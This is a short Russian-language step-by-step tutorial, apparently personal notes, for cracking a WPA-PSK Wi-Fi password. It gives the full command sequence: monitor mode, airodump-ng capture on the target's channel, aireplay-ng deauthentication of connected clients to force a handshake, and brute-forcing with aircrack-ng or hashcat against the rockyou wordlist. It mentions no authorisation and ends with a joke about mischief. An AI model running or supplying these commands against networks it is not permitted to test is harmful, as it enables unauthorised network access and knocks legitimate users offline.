WPA-PSK

Выключить NetworkManager:

sudo systemctl stop NetworkManager

Проверить и убить все мешающие процессы:

sudo airmon-ng check kill

Для перехвата рукопожатия нам необходимо сначала установить на каком канале сидит точка доступа. Для этого переводим наш адаптер в режим монитора (расчехляем метлу):

sudo iwconfig wlan0 mode monitor

Если не сработало, то пробуем более мощное средство:

sudo iw wlan0 set monitor control

После этого запускаем поиск нужной точки:

sudo airodump-ng wlan0

Ищем строчку с целевой точкой доступа, потом обращаем внимание на столбец CH - номер канала.

Далее перезапускаем тулзу на нужном канале и начинаем записывать трафик для того чтобы потом иметь возможность брутить:

sudo airodump-ng wlan0 -c <номер канала> -w <название файлов>

В нижней таблице высматриваем клиентов точки доступа

Деаутентификацию можно сделать с помощью следующей команды:

sudo aireplay-ng -0 0 -a <MAC адрес точки доступа> -c <MAC адрес клиента> wlan0

После этого в окне, где открыт airodump-ng должно появиться сообщение типа "Handshake cuptur"

Далее нужно брутить захваченное рукопожатие:

sudo aircrack-ng <file name>.cap -w /usr/share/wordlists/rockyou.txt

Для того чтобы брутить трушно на видеокартах нам необходимо с полученным файлом сделать некоторые манипуляции:

sudo apt install hashcat-utils

В Kali вроде уже установлено.

После этого:

/usr/lib/hashcat-utils/cap2hccapx.bin <file name input>.cap output.hccapx <ESSID>

Запускаем брут:

hashcat -m 2500 output.hccapx /usr/share/wordlists/rockyou.txt

Если не получилось, можно попробовать один из способов дальше. Если получилось не забываем сказать "шалость удалась".